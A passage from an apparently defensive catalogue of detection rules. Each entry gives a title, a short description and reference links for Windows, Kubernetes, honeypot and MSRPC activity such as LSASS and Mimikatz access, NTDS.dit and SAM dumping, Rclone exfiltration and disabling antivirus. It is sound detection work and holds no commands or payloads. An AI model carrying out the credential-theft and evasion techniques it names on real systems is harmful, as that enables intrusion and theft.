Malware analysis: https://www.joesandbox.com/analysis/514608/0/html#324415FF7D8324231381BAD48A052F85DF04 |
Suspicious Execution of Sc to Delete AV Services |
Detects when attackers use "sc.exe" to delete AV services from the system in order to avoid detection |
https://www.virustotal.com/gui/file/38283b775552da8981452941ea74191aa0d203edd3f61fb2dee7b0aea3514955 |
Stop Windows Service |
Detects a Windows service being stopped |
None |
Suspicious Bitstransfer via PowerShell |
Detects file transfers from the system to a server using the BitsTransfer PowerShell cmdlets |
https://docs.microsoft.com/en-us/powershell/module/bitstransfer/add-bitsfile?view=windowsserver2019-ps |
Suspicious Cmd Execution via WMI |
Detects suspicious command execution (cmd) via Windows Management Instrumentation (WMI) on a remote host. This could be indicative of adversary lateral movement. |
https://www.elastic.co/guide/en/security/current/suspicious-cmd-execution-via-wmi.html |
Suspicious Characters in CommandLine |
Detects suspicious Unicode characters in the command line, which could be a sign of obfuscation or defense evasion |
https://www.wietzebeukema.nl/blog/windows-command-line-obfuscation |
Wscript Execution from Non C Drive |
Detects Wscript or Cscript executing from a drive other than C. This has been observed with Qakbot executing from within a mounted ISO file. |
https://github.com/pr0xylife/Qakbot/blob/main/Qakbot_BB_30.09.2022.txt, https://app.any.run/tasks/4985c746-601e-401a-9ccf-ae350ac2e887/ |
Process Start From Suspicious Folder |
Detects process starts from rare or uncommon folders, such as the temporary folder or folders that usually don't contain executable files |
Malware sandbox results |
Squirrel Lolbin |
Detects possible use of the Squirrel packages manager as a LOLBin |
http://www.hexacorn.com/blog/2019/03/30/sqirrel-packages-manager-as-a-lolbin-a-k-a-many-electron-apps-are-lolbins-by-default/, http://www.hexacorn.com/blog/2018/08/16/squirrel-as-a-lolbin/ |
PsExec Tool Execution |
Detects PsExec service execution via default service image name |
https://www.jpcert.or.jp/english/pub/sr/ir_research.html, https://jpcertcc.github.io/ToolAnalysisResultSheet |
PsExec Service Start |
Detects a PsExec service start |
None |
Run Whoami as SYSTEM |
Detects a whoami.exe executed by LOCAL SYSTEM. This may be a sign of a successful local privilege escalation. |
https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment |
Winword.exe Loads Suspicious DLL |
Detects Winword.exe loading a custom DLL using the /l flag |
https://lolbas-project.github.io/lolbas/OtherMSBinaries/Winword/ |
WMI Execution Via Office Process |
Detects the initial execution of a malicious document that calls wmic to execute the file with regsvr32 |
https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/, https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/02bcbfc2bfb8b4da601bb30de0344ae453aa1afe/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml |
WMI Remote Command Execution |
An adversary might use WMI to execute commands on a remote system |
https://securelist.com/moonbounce-the-dark-side-of-uefi-firmware/105468/, https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/wmic |
WMI Reconnaissance List Remote Services |
An adversary might use WMI to check if a certain remote service is running on a remote device. When the test completes, service information will be displayed on the screen if the service exists. A common feedback message is "No instance(s) Available" if the queried service is not running. A common error message is "Node - (provided IP or default) ERROR Description =The RPC server is unavailable" if the provided remote host is unreachable. |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1047/T1047.md, https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/wmic |
Windows Update Client LOLBIN |
Detects code execution via the Windows Update client (wuauclt) |
https://dtm.uk/wuauclt/ |
Sysinternals SDelete Registry Keys |
A general detection that triggers on the creation or modification of .*\Software\Sysinternals\SDelete registry keys, an indicator of the use of the Sysinternals SDelete tool. |
https://github.com/OTRF/detection-hackathon-apt29/issues/9, https://github.com/OTRF/ThreatHunter-Playbook/blob/2d4257f630f4c9770f78d0c1df059f891ffc3fec/docs/evals/apt29/detections/4.B.2_59A9AC92-124D-4C4B-A6BF-3121C98677C3.md |
Autorun Keys Modification |
Detects modification of autostart extensibility point (ASEP) in registry. |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md, https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns, https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d |
Abusing Windows Telemetry For Persistence - Registry |
Windows telemetry makes use of the binary CompatTelRunner.exe to run a variety of commands and perform the actual telemetry collections. This binary was created to be easily extensible, and to that end, it relies on the registry to instruct it on which commands to run. The problem is, it will run any arbitrary command without restriction of location or type. |
https://www.trustedsec.com/blog/abusing-windows-telemetry-for-persistence/ |
User Account Hidden By Registry |
Detects a registry modification for a specific user that prevents that user from being listed on the logon screen |
https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1564.002/T1564.002.md |
Service Binary in Uncommon Folder |
Detects the creation of a service with a service binary located in an uncommon directory |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md |
Disable Microsoft Office Security Features |
Detects the disabling of Microsoft Office security features via the registry |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md, https://unit42.paloaltonetworks.com/unit42-gorgon-group-slithering-nation-state-cybercrime/, https://yoroi.company/research/cyber-criminal-espionage-operation-insists-on-italian-manufacturing/ |
Adwind RAT / JRAT - Registry |
Detects javaw.exe in AppData folder as used by Adwind / JRAT |
https://www.hybrid-analysis.com/sample/ba86fa0d4b6af2db0656a88b1dd29f36fe362473ae8ad04255c4e52f214a541c?environmentId=100, https://www.first.org/resources/papers/conf2017/Advanced-Incident-Detection-and-Threat-Hunting-using-Sysmon-and-Splunk.pdf |
Office Security Settings Changed |
Detects registry changes to Office macro settings. The TrustRecords contain information on executed macro-enabled documents. (see references) |
https://twitter.com/inversecos/status/1494174785621819397, https://www.mcafee.com/blogs/other-blogs/mcafee-labs/zloader-with-a-new-infection-technique/, https://securelist.com/scarcruft-surveilling-north-korean-defectors-and-human-rights-activists/105074/ |
Potential Persistence Via COM Hijacking From Suspicious Locations |
Detects potential COM object hijacking where the "Server" (In/Out) is pointing to a suspicious or unusual location. |
https://www.microsoft.com/security/blog/2022/07/27/untangling-knotweed-european-private-sector-offensive-actor-using-0-day-exploits/ (idea) |
Potential Persistence Via COM Search Order Hijacking |
Detects potential COM object hijacking leveraging the COM Search Order |
https://www.cyberbit.com/blog/endpoint-security/com-hijacking-windows-overlooked-security-vulnerability/ |
SilentProcessExit Monitor Registration |
Detects changes to the Registry in which a monitor program gets registered to monitor the exit of another process |
https://oddvar.moe/2018/04/10/persistence-using-globalflags-in-image-file-execution-options-hidden-from-autoruns-exe/, https://www.deepinstinct.com/2021/02/16/lsass-memory-dumps-are-stealthier-than-ever-before-part-2/ |
Accessing WinAPI in PowerShell for Credentials Dumping |
Detects access to lsass.exe by PowerShell |
https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse |
DCOM InternetExplorer.Application Iertutil DLL Hijack - Sysmon |
Detects a threat actor creating a file named `iertutil.dll` in the `C:\Program Files\Internet Explorer\` directory over the network and loading it for a DCOM InternetExplorer DLL Hijack scenario. |
https://threathunterplaybook.com/hunts/windows/201009-RemoteDCOMIErtUtilDLLHijack/notebook.html |
Mimikatz Detection LSASS Access |
Detects process access to LSASS which is typical for Mimikatz (0x1000 PROCESS_QUERY_LIMITED_INFORMATION, 0x0400 PROCESS_QUERY_INFORMATION "only old versions", 0x0010 PROCESS_VM_READ) |
https://onedrive.live.com/view.aspx?resid=D026B4699190F1E6!2843&ithint=file%2cpptx&app=PowerPoint&authkey=!AMvCRTKB_V1J5ow, https://web.archive.org/web/20230208123920/https://cyberwardog.blogspot.com/2017/03/chronicles-of-threat-hunter-hunting-for_22.html |
PowerShell Execution |
Detects execution of PowerShell |
https://threathunterplaybook.com/notebooks/windows/02_execution/WIN-190410151110.html |
RClone Execution |
Detects execution of the RClone utility for exfiltration, as used by various ransomware strains like REvil, Conti, FiveHands, etc. |
https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware, https://us-cert.cisa.gov/ncas/analysis-reports/ar21-126a, https://labs.sentinelone.com/egregor-raas-continues-the-chaos-with-cobalt-strike-and-rclone, https://www.splunk.com/en_us/blog/security/darkside-ransomware-splunk-threat-update-and-detections.html |
Windows Defender Threat Detection Disabled |
Detects disabling Windows Defender threat protection |
https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-antivirus/troubleshoot-windows-defender-antivirus, https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md |
Domain Trust Discovery |
Detects a discovery of domain trusts. |
https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1482/T1482.md |
Lateral Movement Indicator ConDrv |
This event was observed on the target host during lateral movement. The process name within the event contains the process spawned post compromise. The account name within the event contains the compromised user account name. This event should be correlated with 4624 and 4688 for further intrusion context. |
https://jpcertcc.github.io/ToolAnalysisResultSheet/details/wmiexec-vbs.htm, https://www.fireeye.com/blog/threat-research/2017/08/monitoring-windows-console-activity-part-one.html |
Security Event Log Cleared |
Checks for event id 1102 which indicates the security event log was cleared. |
https://github.com/Azure/Azure-Sentinel/blob/f99542b94afe0ad2f19a82cc08262e7ac8e1428e/Detections/SecurityEvent/SecurityEventLogCleared.yaml |
Group Modification Logging |
Configure systems to issue a log entry and alert when an account is added to or removed from any group assigned administrative privileges. Sigma detects: Event ID 4728, which indicates a "Member is added to a Security Group"; Event ID 4729, which indicates a "Member is removed from a Security-enabled group"; and Event ID 4730, which indicates a "Security Group is deleted". The case is not applicable for Unix OS. Supported OS: Windows 2008 R2 and 7, Windows 2012 R2 and 8.1, Windows 2016 and 10, Windows Server 2019, Windows Server 2000, Windows 2003 and XP. |
https://www.cisecurity.org/controls/cis-controls-list/, https://www.pcisecuritystandards.org/documents/PCI_DSS_v3-2-1.pdf, https://nvlpubs.nist.gov/nistpubs/CSWP/NIST.CSWP.04162018.pdf, https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=4728, https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=4729, https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=4730, https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=633, https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=632, https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=634 |
Suspicious Esentutl Use |
Detects flags often used with the LOLBAS Esentutl for malicious activity. It could be used in rare cases by administrators to access locked files or during maintenance. |
https://lolbas-project.github.io/, https://twitter.com/chadtilbury/status/1264226341408452610 |
Correct Execution of Nltest.exe |
The attacker might use LOLBAS nltest.exe for discovery of domain controllers, domain trusts, parent domain and the current user permissions. |
https://jpcertcc.github.io/ToolAnalysisResultSheet/details/nltest.htm, https://attack.mitre.org/software/S0359/ |
Rclone Execution via Command Line or PowerShell |
Detects Rclone which is commonly used by ransomware groups for exfiltration |
https://research.nccgroup.com/2021/05/27/detecting-rclone-an-effective-tool-for-exfiltration/ |
Activity Related to NTDS.dit Domain Hash Retrieval |
Detects suspicious commands that could be related to activity that uses volume shadow copy to steal and retrieve hashes from the NTDS.dit file remotely |
https://www.swordshield.com/2015/07/getting-hashes-from-ntds-dit-file/, https://room362.com/post/2013/2013-06-10-volume-shadow-copy-ntdsdit-domain-hashes-remotely-part-1/, https://www.trustwave.com/Resources/SpiderLabs-Blog/Tutorial-for-NTDS-goodness-(VSSADMIN,-WMIS,-NTDS-dit,-SYSTEM)/, https://securingtomorrow.mcafee.com/mcafee-labs/new-teslacrypt-ransomware-arrives-via-spam/, https://dfironthemountain.wordpress.com/2018/12/06/locked-file-access-using-esentutl-exe/ |
New Service Uses Double Ampersand in Path |
Detects a service installation that uses a suspicious double ampersand in the image path value |
Internal Research |
SAM Dump to AppData |
Detects suspicious SAM dump activity as caused by QuarksPwDump and other password dumpers |
None |
Django Framework Exceptions |
Detects suspicious Django web application framework exceptions that could indicate exploitation attempts |
https://docs.djangoproject.com/en/1.11/ref/exceptions/, https://docs.djangoproject.com/en/1.11/topics/logging/#django-security |
Potential JNDI Injection Exploitation In JVM Based Application |
Detects potential JNDI Injection exploitation. Often coupled with Log4Shell exploitation. |
https://www.wix.engineering/post/threat-and-vulnerability-hunting-with-application-server-error-logs, https://secariolabs.com/research/analysing-and-reproducing-poc-for-log4j-2-15-0 |
Potential Local File Read Vulnerability In JVM Based Application |
Detects potential local file read vulnerabilities in JVM-based apps. If the exceptions are caused by user input and contain path traversal payloads, then it's a red flag. |
https://www.wix.engineering/post/threat-and-vulnerability-hunting-with-application-server-error-logs |
Potential OGNL Injection Exploitation In JVM Based Application |
Detects potential OGNL Injection exploitation, which may lead to RCE. OGNL is an expression language that is supported in many JVM-based systems. OGNL Injection is the reason for some high-profile RCEs such as Apache Struts (CVE-2017-5638) and Confluence (CVE-2022-26134). |
https://www.wix.engineering/post/threat-and-vulnerability-hunting-with-application-server-error-logs |
Kubernetes CronJob/Job Modification |
Detects when a Kubernetes CronJob or Job is created or modified. A Kubernetes Job creates one or more pods to accomplish a specific task, and a CronJob creates Jobs on a recurring schedule. An adversary can take advantage of this Kubernetes object to schedule Jobs to run containers that execute malicious code within a cluster, allowing them to achieve persistence. |
https://kubernetes.io/docs/reference/config-api/apiserver-audit.v1/, https://www.redhat.com/en/blog/protecting-kubernetes-against-mitre-attck-persistence#technique-33-kubernetes-cronjob |
Process Execution Error In JVM Based Application |
Detects process execution related exceptions in JVM-based apps, which often relate to RCE |
https://www.wix.engineering/post/threat-and-vulnerability-hunting-with-application-server-error-logs |
Potential XXE Exploitation Attempt In JVM Based Application |
Detects XML parsing issues. If the application is expected to work with XML, make sure that the parser is initialized safely. |
https://rules.sonarsource.com/java/RSPEC-2755, https://owasp.org/www-community/vulnerabilities/XML_External_Entity_(XXE)_Processing, https://www.wix.engineering/post/threat-and-vulnerability-hunting-with-application-server-error-logs |
Kubernetes Admission Controller Modification |
Detects when a modification (create, update or replace) action is taken that affects mutating or validating webhook configurations, as they can be used by an adversary to achieve persistence or exfiltrate access credentials. |
https://kubernetes.io/docs/reference/config-api/apiserver-audit.v1/, https://security.padok.fr/en/blog/kubernetes-webhook-attackers |
Deployment Deleted From Kubernetes Cluster |
Detects the removal of a deployment from a Kubernetes cluster. This could indicate disruptive activity aiming to impact business operations. |
https://microsoft.github.io/Threat-Matrix-for-Kubernetes/techniques/Data%20destruction/ |
Kubernetes Events Deleted |
Detects when events are deleted in Kubernetes. An adversary may delete Kubernetes events in an attempt to evade detection. |
https://microsoft.github.io/Threat-Matrix-for-Kubernetes/techniques/Delete%20K8S%20events/ |
Potential Remote Command Execution In Pod Container |
Detects attempts to execute remote commands within a Pod's container, e.g. using the "kubectl exec" command. |
https://microsoft.github.io/Threat-Matrix-for-Kubernetes/techniques/Exec%20into%20container/ |
Container With A hostPath Mount Created |
Detects creation of a container with a hostPath mount. A hostPath volume mounts a directory or a file from the node to the container. Attackers who have permissions to create a new pod in the cluster may create one with a writable hostPath volume and chroot to escape to the underlying node. |
https://microsoft.github.io/Threat-Matrix-for-Kubernetes/techniques/Writable%20hostPath%20mount/, https://blog.appsecco.com/kubernetes-namespace-breakout-using-insecure-host-path-volume-part-1-b382f2a6e216 |
Privileged Container Deployed |
Detects the creation of a "privileged" container, an action which could be indicative of a threat actor mounting a container breakout attack. A privileged container is a container that can access the host with all of the root capabilities of the host machine. This allows it to view, interact with and modify processes, network operations, IPC calls, the file system, mount points, SELinux configurations etc. as the root user on the host. Various versions of "privileged" containers can be specified, e.g. by setting the securityContext.privileged flag in the resource specification, setting non-standard Linux capabilities, or configuring the hostNetwork/hostPID fields. |
https://microsoft.github.io/Threat-Matrix-for-Kubernetes/techniques/Privileged%20container/, https://docs.aws.amazon.com/guardduty/latest/ug/guardduty_finding-types-kubernetes.html#privilegeescalation-kubernetes-privilegedcontainer, https://www.elastic.co/guide/en/security/current/kubernetes-pod-created-with-hostnetwork.html, https://www.elastic.co/guide/en/security/current/kubernetes-container-created-with-excessive-linux-capabilities.html |
Creation Of Pod In System Namespace |
Detects deployments of pods within the kube-system namespace, which could be intended to imitate system pods. System pods, created by controllers such as Deployments or DaemonSets, have random suffixes in their names. Attackers can use this fact and name their backdoor pods as if they were created by these controllers to avoid detection. Deployment of such a backdoor container, e.g. one named kube-proxy-bv61v, could be attempted in the kube-system namespace alongside the other administrative containers. |
https://microsoft.github.io/Threat-Matrix-for-Kubernetes/techniques/Pod%20or%20container%20name%20similarily/ |
RBAC Permission Enumeration Attempt |
Detects identities attempting to enumerate their Kubernetes RBAC permissions. In the early stages of a breach, attackers will aim to list the permissions they have within the compromised environment. In a Kubernetes cluster, this can be achieved by interacting with the API server and querying the SelfSubjectAccessReview API, e.g. via a "kubectl auth can-i --list" command. This will enumerate the Role-Based Access Control (RBAC) rules defining the compromised user's authorization. |
https://www.elastic.co/guide/en/security/current/kubernetes-suspicious-self-subject-review.html |
Kubernetes Rolebinding Modification |
Detects when a Kubernetes Rolebinding is created or modified. |
https://kubernetes.io/docs/reference/config-api/apiserver-audit.v1/, https://medium.com/@seifeddinerajhi/kubernetes-rbac-privilege-escalation-exploits-and-mitigations-26c07629eeab |
Kubernetes Secrets Enumeration |
Detects enumeration of Kubernetes secrets. |
https://microsoft.github.io/Threat-Matrix-for-Kubernetes/techniques/List%20K8S%20secrets/ |
Kubernetes Secrets Modified or Deleted |
Detects when Kubernetes Secrets are modified or deleted. |
https://kubernetes.io/docs/reference/config-api/apiserver-audit.v1/, https://commandk.dev/blog/guide-to-audit-k8s-secrets-for-compliance/ |
New Kubernetes Service Account Created |
Detects creation of a new Kubernetes service account, which could indicate an attacker's attempt to persist within a cluster. |
https://microsoft.github.io/Threat-Matrix-for-Kubernetes/techniques/container%20service%20account/ |
Potential Sidecar Injection Into Running Deployment |
Detects attempts to inject a sidecar container into a running deployment. A sidecar container is an additional container within a pod that resides alongside the main container. One way to add containers to running resources like Deployments/DaemonSets/StatefulSets is via a "kubectl patch" operation. By injecting a new container within a legitimate pod, an attacker can run their code and hide their activity, instead of running their own separate pod in the cluster. |
https://kubernetes.io/docs/tasks/manage-kubernetes-objects/update-api-object-kubectl-patch, https://microsoft.github.io/Threat-Matrix-for-Kubernetes/techniques/Sidecar%20Injection/ |
Kubernetes Unauthorized or Unauthenticated Access |
Detects when a request to the Kubernetes API is rejected due to lack of authorization or due to an expired authentication token being used. This may indicate an attacker attempting to leverage credentials they have obtained. |
https://kubernetes.io/docs/reference/config-api/apiserver-audit.v1/, https://www.datadoghq.com/blog/monitor-kubernetes-audit-logs/#monitor-api-authentication-issues |
Potential RCE Exploitation Attempt In NodeJS |
Detects process execution related errors in NodeJS. If the exceptions are caused due to user input then they may suggest an RCE vulnerability. |
https://www.wix.engineering/post/threat-and-vulnerability-hunting-with-application-server-error-logs |
OpenCanary - FTP Login Attempt |
Detects instances where an FTP service on an OpenCanary node has had a login attempt. |
https://opencanary.readthedocs.io/en/latest/starting/configuration.html#services-configuration, https://github.com/thinkst/opencanary/blob/a0896adfcaf0328cfd5829fe10d2878c7445138e/opencanary/logger.py#L52 |
OpenCanary - GIT Clone Request |
Detects instances where a GIT service on an OpenCanary node has had a Git clone request. |
https://opencanary.readthedocs.io/en/latest/starting/configuration.html#services-configuration, https://github.com/thinkst/opencanary/blob/a0896adfcaf0328cfd5829fe10d2878c7445138e/opencanary/logger.py#L52 |
OpenCanary - HTTPPROXY Login Attempt |
Detects instances where an HTTPPROXY service on an OpenCanary node has had an attempt to proxy another page. |
https://opencanary.readthedocs.io/en/latest/starting/configuration.html#services-configuration, https://github.com/thinkst/opencanary/blob/a0896adfcaf0328cfd5829fe10d2878c7445138e/opencanary/logger.py#L52 |
OpenCanary - HTTP GET Request |
Detects instances where an HTTP service on an OpenCanary node has received a GET request. |
https://opencanary.readthedocs.io/en/latest/starting/configuration.html#services-configuration, https://github.com/thinkst/opencanary/blob/a0896adfcaf0328cfd5829fe10d2878c7445138e/opencanary/logger.py#L52 |
OpenCanary - HTTP POST Login Attempt |
Detects instances where an HTTP service on an OpenCanary node has had a login attempt via form POST. |
https://opencanary.readthedocs.io/en/latest/starting/configuration.html#services-configuration, https://github.com/thinkst/opencanary/blob/a0896adfcaf0328cfd5829fe10d2878c7445138e/opencanary/logger.py#L52 |
OpenCanary - MSSQL Login Attempt Via SQLAuth |
Detects instances where an MSSQL service on an OpenCanary node has had a login attempt using SQLAuth. |
https://opencanary.readthedocs.io/en/latest/starting/configuration.html#services-configuration, https://github.com/thinkst/opencanary/blob/a0896adfcaf0328cfd5829fe10d2878c7445138e/opencanary/logger.py#L52 |
OpenCanary - MSSQL Login Attempt Via Windows Authentication |
Detects instances where an MSSQL service on an OpenCanary node has had a login attempt using Windows Authentication. |
https://opencanary.readthedocs.io/en/latest/starting/configuration.html#services-configuration, https://github.com/thinkst/opencanary/blob/a0896adfcaf0328cfd5829fe10d2878c7445138e/opencanary/logger.py#L52 |
OpenCanary - MySQL Login Attempt |
Detects instances where a MySQL service on an OpenCanary node has had a login attempt. |
https://opencanary.readthedocs.io/en/latest/starting/configuration.html#services-configuration, https://github.com/thinkst/opencanary/blob/a0896adfcaf0328cfd5829fe10d2878c7445138e/opencanary/logger.py#L52 |
OpenCanary - NTP Monlist Request |
Detects instances where an NTP service on an OpenCanary node has had an NTP monlist request. |
https://opencanary.readthedocs.io/en/latest/starting/configuration.html#services-configuration, https://github.com/thinkst/opencanary/blob/a0896adfcaf0328cfd5829fe10d2878c7445138e/opencanary/logger.py#L52 |
OpenCanary - REDIS Action Command Attempt |
Detects instances where a REDIS service on an OpenCanary node has had an action command attempted. |
https://opencanary.readthedocs.io/en/latest/starting/configuration.html#services-configuration, https://github.com/thinkst/opencanary/blob/a0896adfcaf0328cfd5829fe10d2878c7445138e/opencanary/logger.py#L52 |
OpenCanary - SIP Request |
Detects instances where an SIP service on an OpenCanary node has had a SIP request. |
https://opencanary.readthedocs.io/en/latest/starting/configuration.html#services-configuration, https://github.com/thinkst/opencanary/blob/a0896adfcaf0328cfd5829fe10d2878c7445138e/opencanary/logger.py#L52 |
OpenCanary - SMB File Open Request |
Detects instances where an SMB service on an OpenCanary node has had a file open request. |
https://opencanary.readthedocs.io/en/latest/starting/configuration.html#services-configuration, https://github.com/thinkst/opencanary/blob/a0896adfcaf0328cfd5829fe10d2878c7445138e/opencanary/logger.py#L52 |
OpenCanary - SNMP OID Request |
Detects instances where an SNMP service on an OpenCanary node has had an OID request. |
https://opencanary.readthedocs.io/en/latest/starting/configuration.html#services-configuration, https://github.com/thinkst/opencanary/blob/a0896adfcaf0328cfd5829fe10d2878c7445138e/opencanary/logger.py#L52 |
OpenCanary - SSH Login Attempt |
Detects instances where an SSH service on an OpenCanary node has had a login attempt. |
https://opencanary.readthedocs.io/en/latest/starting/configuration.html#services-configuration, https://github.com/thinkst/opencanary/blob/a0896adfcaf0328cfd5829fe10d2878c7445138e/opencanary/logger.py#L52 |
OpenCanary - SSH New Connection Attempt |
Detects instances where an SSH service on an OpenCanary node has had a connection attempt. |
https://opencanary.readthedocs.io/en/latest/starting/configuration.html#services-configuration, https://github.com/thinkst/opencanary/blob/a0896adfcaf0328cfd5829fe10d2878c7445138e/opencanary/logger.py#L52 |
OpenCanary - Telnet Login Attempt |
Detects instances where a Telnet service on an OpenCanary node has had a login attempt. |
https://opencanary.readthedocs.io/en/latest/starting/configuration.html#services-configuration, https://github.com/thinkst/opencanary/blob/a0896adfcaf0328cfd5829fe10d2878c7445138e/opencanary/logger.py#L52 |
OpenCanary - TFTP Request |
Detects instances where a TFTP service on an OpenCanary node has had a request. |
https://opencanary.readthedocs.io/en/latest/starting/configuration.html#services-configuration, https://github.com/thinkst/opencanary/blob/a0896adfcaf0328cfd5829fe10d2878c7445138e/opencanary/logger.py#L52 |
OpenCanary - VNC Connection Attempt |
Detects instances where a VNC service on an OpenCanary node has had a connection attempt. |
https://opencanary.readthedocs.io/en/latest/starting/configuration.html#services-configuration, https://github.com/thinkst/opencanary/blob/a0896adfcaf0328cfd5829fe10d2878c7445138e/opencanary/logger.py#L52 |
Python SQL Exceptions |
Generic rule for SQL exceptions in Python according to PEP 249 |
https://www.python.org/dev/peps/pep-0249/#exceptions |
Remote Schedule Task Lateral Movement via ATSvc |
Detects remote RPC calls to create or execute a scheduled task via ATSvc |
https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-tsch/d1058a28-7e02-4948-8b8d-4a347fa64931, https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-TSCH.md, https://github.com/zeronetworks/rpcfirewall, https://zeronetworks.com/blog/stopping-lateral-movement-via-the-rpc-firewall/ |
Remote Schedule Task Recon via ATSvc |
Detects remote RPC calls to read information about scheduled tasks via ATSvc |
https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-tsch/d1058a28-7e02-4948-8b8d-4a347fa64931, https://github.com/zeronetworks/rpcfirewall, https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-TSCH.md, https://zeronetworks.com/blog/stopping-lateral-movement-via-the-rpc-firewall/ |
Possible DCSync Attack |
Detects remote RPC calls to MS-DRSR from non-DC hosts, which could indicate DCSync / DCShadow attacks. |
https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-drsr/f977faaa-673e-4f66-b9bf-48c640241d47?redirectedfrom=MSDN, https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-DRSR.md, https://github.com/zeronetworks/rpcfirewall, https://zeronetworks.com/blog/stopping-lateral-movement-via-the-rpc-firewall/ |
Remote Event Log Recon |
Detects remote RPC calls to get event log information via EVEN or EVEN6 |
https://github.com/zeronetworks/rpcfirewall, https://zeronetworks.com/blog/stopping-lateral-movement-via-the-rpc-firewall/ |
Remote Encrypting File System Abuse |
Detects remote RPC calls to possibly abuse remote encryption service via MS-EFSR |
https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-36942, https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-EFSR.md, https://github.com/zeronetworks/rpcfirewall, https://zeronetworks.com/blog/stopping-lateral-movement-via-the-rpc-firewall/ |
Remote Schedule Task Lateral Movement via ITaskSchedulerService |
Detects remote RPC calls to create or execute a scheduled task |
https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-tsch/d1058a28-7e02-4948-8b8d-4a347fa64931, https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-TSCH.md, https://github.com/zeronetworks/rpcfirewall, https://zeronetworks.com/blog/stopping-lateral-movement-via-the-rpc-firewall/ |
Remote Schedule Task Recon via ITaskSchedulerService |
Detects remote RPC calls to read information about scheduled tasks |
https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-tsch/d1058a28-7e02-4948-8b8d-4a347fa64931, https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-TSCH.md, https://github.com/zeronetworks/rpcfirewall, https://zeronetworks.com/blog/stopping-lateral-movement-via-the-rpc-firewall/ |
Remote Printing Abuse for Lateral Movement |
Detects remote RPC calls to possibly abuse remote printing service via MS-RPRN / MS-PAR |
https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527, https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-rprn/d42db7d5-f141-4466-8f47-0a4be14e2fc1, https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-pan/e44d984c-07d3-414c-8ffc-f8c8ad8512a8, https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-RPRN-PAR.md, https://github.com/zeronetworks/rpcfirewall, https://zeronetworks.com/blog/stopping-lateral-movement-via-the-rpc-firewall/ |
Remote DCOM/WMI Lateral Movement |
Detects remote RPC calls that perform remote DCOM operations. These could be abused for lateral movement via DCOM or WMI. |
https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-srvs/accf23b0-0f57-441c-9185-43041f1b0ee9, https://github.com/zeronetworks/rpcfirewall, https://zeronetworks.com/blog/stopping-lateral-movement-via-the-rpc-firewall/ |
Remote Registry Lateral Movement |
Detects remote RPC calls to modify the registry and possibly execute code |
https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-rrp/0fa3191d-bb79-490a-81bd-54c2601b7a78, https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-RRP.md, https://github.com/zeronetworks/rpcfirewall, https://zeronetworks.com/blog/stopping-lateral-movement-via-the-rpc-firewall/ |
Remote Registry Recon |
Detects remote RPC calls to collect information |
https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-rrp/0fa3191d-bb79-490a-81bd-54c2601b7a78, https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-RRP.md, https://github.com/zeronetworks/rpcfirewall, https://zeronetworks.com/blog/stopping-lateral-movement-via-the-rpc-firewall/ |
Remote Server Service Abuse |
Detects remote RPC calls to possibly abuse remote encryption service via MS-SRVS |
